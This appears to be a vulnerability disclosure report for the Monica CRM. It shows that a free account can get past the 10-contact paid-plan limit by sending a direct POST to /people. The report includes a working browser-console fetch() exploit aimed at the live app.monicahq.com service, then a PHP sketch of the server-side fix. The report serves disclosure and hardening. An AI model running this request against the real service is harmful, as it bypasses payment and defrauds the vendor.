monica

vulnerability improper access control - generic (cwe-284)
severity 8.8
language php
registry other

✍️ Description

Bypass of payment verification to add more contacts. A free account can add only 10 contacts, but using this bug a user can add more than 10 contacts for free: the limit is only enforced by the web UI, and the POST to /people accepts new contacts regardless.

🕵️‍♂️ Proof of Concept

  1. First go to https://app.monicahq.com/people from a free account and add 10 contacts. Now you can't add more contacts; you need to buy a Pro account. Now bypass this payment and add more contacts using the request below:
// Issued from the browser console while logged in to the free account.
// The _token value is the account's own CSRF token (see note below).
await fetch("https://app.monicahq.com/people", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"
    },
    // Same form fields the "Add contact" page submits; the server does not
    // check the plan's contact limit before creating the record.
    "body": "_token=RO5UHOXKg6GWDtSlSpfcQEFtN4Dpo1cwW3ueFMEa&first_name=user33333&middle_name=&last_name=&nickname=&gender=&save=true",
    "method": "POST",
    "mode": "cors"
});

Here, replace the _token value in the request body with your own, open your browser console and execute the code above; a new contact is created. Using this bug a user can add more than 10 contacts from a free account. See the video PoC below.

Video PoC:

https://drive.google.com/file/d/1MVnodLp0m21ZQ2zvI5kicqJHlJ0h9mll/view?usp=sharing
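The root cause is that the contact limit is checked only where the "Add contact" button is rendered, not in the handler that processes the POST. The following is an added example, not Monica's code: a plain-PHP sketch of the vulnerable pattern next to the hardened one, where the POST handler re-checks the limit against the server's own count. The Account class, its fields and the 10-contact free limit are assumptions for the demo.

```php
<?php
// Added example (not Monica's code): server-side enforcement of a plan limit.
// Assumption: a free plan allows 10 contacts; a Pro plan is unlimited.
declare(strict_types=1);

const FREE_CONTACT_LIMIT = 10;

// Hypothetical account state; in a real app this comes from the database.
final class Account
{
    public function __construct(public bool $isPro, public int $contactCount) {}
}

// Vulnerable pattern: the limit lives only in the page that hides the
// "Add contact" button, so a direct POST to /people skips it entirely.
function createContactUnchecked(Account $account, string $firstName): array
{
    $account->contactCount++;
    return ['status' => 201, 'first_name' => $firstName];
}

// Hardened pattern: the POST handler itself decides, using the server-side
// count and plan, whether another contact may be created.
function canAddContact(Account $account): bool
{
    return $account->isPro || $account->contactCount < FREE_CONTACT_LIMIT;
}

function createContact(Account $account, string $firstName): array
{
    if (!canAddContact($account)) {
        // Log the rejection: a burst of these for one account is a useful
        // detection signal for clients that bypass the UI.
        error_log("contact limit reached: contacts={$account->contactCount}");
        return ['status' => 403, 'error' => 'Free plan allows ' . FREE_CONTACT_LIMIT . ' contacts'];
    }
    $account->contactCount++;
    return ['status' => 201, 'first_name' => $firstName];
}

// Constructed demo: a free account that already holds its 10 contacts.
$free = new Account(isPro: false, contactCount: 10);
echo "unchecked handler: ", createContactUnchecked($free, 'user33333')['status'], "\n"; // accepts the 11th contact
$free->contactCount = 10;
echo "checked handler:   ", createContact($free, 'user33333')['status'], "\n";          // rejects it
$pro = new Account(isPro: true, contactCount: 10);
echo "pro account:       ", createContact($pro, 'user33333')['status'], "\n";           // Pro is unlimited
```

The count-then-insert check must run inside the same database transaction as the insert (or be backed by a constraint), otherwise concurrent POSTs can still push an account past the limit.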

💥 Impact

Payment bypass: a free account can exceed the 10-contact limit of the free plan without paying for a Pro account.